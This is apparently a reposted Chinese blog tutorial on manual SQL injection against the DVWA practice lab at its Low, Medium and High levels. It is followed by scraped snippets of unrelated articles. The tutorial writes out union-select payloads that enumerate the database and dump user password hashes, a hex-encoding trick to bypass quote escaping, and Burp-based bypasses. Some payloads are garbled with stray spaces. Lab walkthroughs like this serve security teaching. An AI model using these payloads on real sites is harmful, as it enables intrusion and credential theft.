SQL回显

DVWA-SQL注入

DVWA是一个基于PHP和MySQL开发的漏洞测试平台

测试环境

应用程序: phpStudy(apache,php,mysql)

测试程序: firefox, new hacker, burpsuite,sqlmap,中国菜刀

一、        SQL注入

SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到恶意SQL语句的目的。

二、        手工注入常规思路

1.判断是否存在注入,注入是字符型还是数字型

2.猜解SQL查询语句中的字段数

3.确定回显位置

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.得到数据

三、DVWA注入分析

先将DVWA的级别设置为LOW

  1. 1.    分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查询,分析sql查询语句,可能存在字符型sq1注入

2.   判断sql是否存在注入,以及注入的类型。1and 1=1

3.   猜测SQL查询语句中的字段数,1order  by  1#

1order  by  2#

1order  by  3#

从上面两个图可以看出,SQL语句查询的表字段数是2,确定显示的位置(SQL语句查询之后的回显位置)

1union select  1,2#        从下图中可以看到有两个回显

查询当前的数据库,以及版本

1union select  version(),database() #  

获取数据库中的表,1union select  1group_concat(table_name) from information_schema.tables where table_schema=database ()#

获取表中的字段名,1union  select  1group_concat(column_name) from information_schema.columns where table_name=users#

获取字段中的数据,1union  select  user,password from users#

DVWA的级别设置为Medium

中级加入了一些防御,不让用户输入,只提供选择(可用burpsuit抓包来绕过),分析源码可以看到对参数的使用mysql_real_escape_string函数转义sql语句中的一些特殊字符,查看sql查询语句可以看出可能存在数字型sql注入。

通过burpsuit抓包,修改数据包,绕过防御。判断注入点,以及注入的类型,下图可以看到,存在注入,注入类型是数字型注入。1 and 1=1#

猜解sql查询语句中的字段的个数,测试字段个数1,1 order by
1#

测试字段个数2,1 order by 2#

测试字段个数3,1 order by 3#。返回错误页面, 所以字段数为2

确定回显的位置,下图可以说明有2个回显位置,1 union select 1,2#

获取当前数据库的名称以及版本,
union select database(), version()#

获取数据库中的所有表,1 union select 1, group_ concat (table_ name) frominformation_ schema. tables where table_ schema=database()#

获取表中的所有字段名,考虑到单引号被转义,可以利用16 进制进行绕过。1union select 1, group_ concat (column_ name) from information_ schema. col umnswhere table_ name=0x7573657273#

获取字段中的数据,1union se lect user, password from users#

将DVWA的级别设置为High

将dvwa设置为高级,可以看出,点击”here to change your ID”,页面自动跳转,防御了自动化的SQL注入,分析源码可以看到,对参数没有做防御,在sql查询语句中限制了查询条数,可以通过burpsuit抓包,修改数据包实现绕过。

点开链接显示下图

发送1

查看源码

获得密码,1’ union select user, password from users#

将DVWA的级别设置为Impossible,分析源码可以看到使用了PD0技术,杜绝了SQL注入。

原文地址:https://www.cnblogs.com/7-58/p/12147071.html

时间: 2024-11-09 00:11:37

SQL回显的相关文章

sql回显注入-笔记

拼接sql命令查询数据 注释 常用于sql注入 # 井号 单行注释 注意:URL编码 %23 -- 两个减号加空格 单行注释 /*  */    注释一个区域 注意!在sql注入遇到单引号被转译的情况可以使用 HEX编码 绕过单引号的使用 注入测试poc 1 or 1=1 1' or '1=1 1" or "1=1 sql注入用法 查看表单字段数(列数) 使用二分法   order by 列数   排序 确定回显点 XXX' union select 1,2; http://192.1

web实战之sql回显注入

基于错误回显的sql注入整理

由于复习,停了好几天,今天换换模式做了一下关于错误回显的ctf题目,首先附上题目:here 整理了一下网上的一些关于错误回显的方法,在这里就不带上地址了,请大牛们原谅:P 0x00 关于错误回显 用我自己的话来讲,基于错误回显的sql注入就是通过sql语句的矛盾性来使数据被回显到页面上(当然在实际应用中得能回显在页面上,一般的网站都回避免这种情况,哈哈,要是能碰上你就偷着乐吧). 0x01  用于错误回显的sql语句(下面的函数撸主只在mysql下试过也能成功,其他数据库有待考证,待有实例的时候

7、struts2 案例( 模型驱动、 防止表单重复提交--拦截器 、数据回显 、值栈 、 OGNL表达式综合运用)

struts2 案例 技术点: 模型驱动 防止表单重复提交–拦截器 数据回显 值栈 OGNL表达式 通配符.路径匹配原则.常量 数据处理的集中方式 请求数据自动封装以及类型转换 1.导包 c3p0-0.9.1.2.jar commons-dbutils-1.6.jar commons-fileupload-1.2.2.jar commons-io-2.0.1.jar commons-lang3-3.1.jar freemarker-2.3.19.jar javassist-3.11.0.GA.j

【API】高德地图API JS实现获取坐标和回显点标记

1.搜索+选择+获取经纬度和详细地址 2.回显数据并点标记 3.实现 第一步:引入资源文件 <!--引入高德地图JSAPI --><script src="//webapi.amap.com/maps?v=1.3&key=在官网申请一个key"></script><!--引入UI组件库(1.0版本) --><script src="//webapi.amap.com/ui/1.0/main.js">

SpringMVC框架下数据的增删改查,数据类型转换,数据格式化,数据校验,错误输入的消息回显

在eclipse中javaEE环境下: 这儿并没有连接数据库,而是将数据存放在map集合中: 将各种架包导入lib下... web.xml文件配置为 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://java.sun.com/xml/ns/

客户端调用 CMD 命令并回显结果。

using System; using System.Collections.Generic; using System.ComponentModel; using System.Data; using System.Drawing; using System.IO; using System.Linq; using System.Text; using System.Text.RegularExpressions; using System.Windows.Forms; using Syste

Linux终端下简单的登录程序 密码不回显

在Linux进行登录是输入密码不会被回显,所以我也写了个简单的登入程序,使得在输入密码时不再进行回显. #include <stdio.h> #include <stdlib.h> #include <termios.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <stdbool.h> #define USER_NAME &qu

struts JSP表单数据的显示和回显

1.链接 1)<a href="${pageContext.request.contextPath}/visit/add.action  /> 2)<a href="${pageContext.request.contextPath }/customer/edit?cust_id=<s:property value="#customer.cust_id" />" onclick="return window.conf